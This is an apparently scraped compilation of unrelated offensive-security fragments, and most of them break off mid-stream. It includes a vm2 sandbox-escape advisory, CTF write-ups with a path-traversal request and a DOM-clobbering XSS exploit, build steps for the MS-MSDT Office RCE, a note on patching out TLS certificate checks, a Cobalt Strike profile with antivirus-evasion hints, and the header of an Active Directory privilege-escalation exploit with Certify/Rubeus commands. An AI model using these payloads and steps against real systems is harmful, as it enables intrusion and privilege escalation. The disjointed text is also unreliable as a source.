Nick deltaclock

Sandbox Escape in [email protected]

Summary

There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass handleException() and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context.

Proof of Concept

Postviewer - writeup

Challenge's overview

The rumor tells that adm1n stores their secret split into multiple documents. Can you catch 'em all? https://postviewer-web.2022.ctfcompetition.com

The challenge consisted of a simple page that was very simple and all client-side, i.e. no backend code was involved. A user can upload any file which will be then locally stored in indexedDB. They can preview their files by either clicking on the title or by visiting file's URL, for example https://postviewer-web.2022.ctfcompetition.com/#file-01d6039e3e157ebcbbf6b2f7cb2dc678f3b9214d. The preview of the file is rendered inside a blob created from data: URL. The rendering occurs by sending file's contents to the iframe via postMessage({ body, mimeType }, '*')

Additionally, there is a /bot endpoint which lets players send URLs to an xss-bot imitating another user. The goal is to steal their documents.

Don't you think it is a baby challenge?

Bypass the extension check

 Object.keys(req.files).forEach(function(key){
        var filename = req.files[key].name.toLowerCase();
        var position = filename.lastIndexOf('.');
        if (position == -1) {
          return next();
        }
        var ext = filename.substr(position);

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

Tested on Workplace for Android version 362.0.0.29.109. This approach might work in other Facebook/Meta applications. Thank you Imre Rad for helping me analyze the binary.

How does it work?

The Workplace Android app uses the Fizz open source TLS-1.3 library to communicate with the backend APIs. This library is written in C++, and is compiled to native code. It is running as a native library attached to the Android app.

The certificate verification is implemented in fizz/client/ClientProtocol.cpp, on line 1944. The easiest way to bypass this check is to patch the if (state.verifier()) { check on line 1942.

EASYPHP

GET /%2561dmin%3Flogin&data=..%252F..%252F..%252F..%252Fflag HTTP/1.1
Host: 124.71.132.232:60080
User-Agent: AG

CandySHOP

leak:

	# Build v8 x64 on modern Linux
	# Time to run: about 1.2hrs at 8Gb RAM / 8 cores, Ubuntu 22.04 LTS

	# This dockerfile is part of Zero Day Engineering training materials on JavaScript engines internals and vulnerability research
	# https://zerodayengineering.com
	# @zerodaytraining

	FROM ubuntu:bionic
	MAINTAINER [email protected]
	RUN apt-get update && apt-get upgrade

	<html>
	<body>
	<script>
	// clobber document.getElementById and make window.calc.contentWindow undefined
	open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

	function start(){
	var ifr = document.createElement('iframe');
	// create sandboxed domain, open challenge page and force its origin to be null
	// null origin makes window.token undefined because of the error when accessing document.cookie

	# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
	# as stage0, remote injecting a thread into a suspended process works

	set host_stage "false";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
	set sleeptime "10000";

	stage {
	set allocator "MapViewOfFile";
	set name "notevil.dll";

	// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
	// Author: @domchell - MDSec
	// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
	// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)

	// Steps:
	// 1. Escalate on any workstation (hint: krbrelayup ftw)
	// 2. Execute UpdateMachineAccount.exe as SYSTEM
	// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
	// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)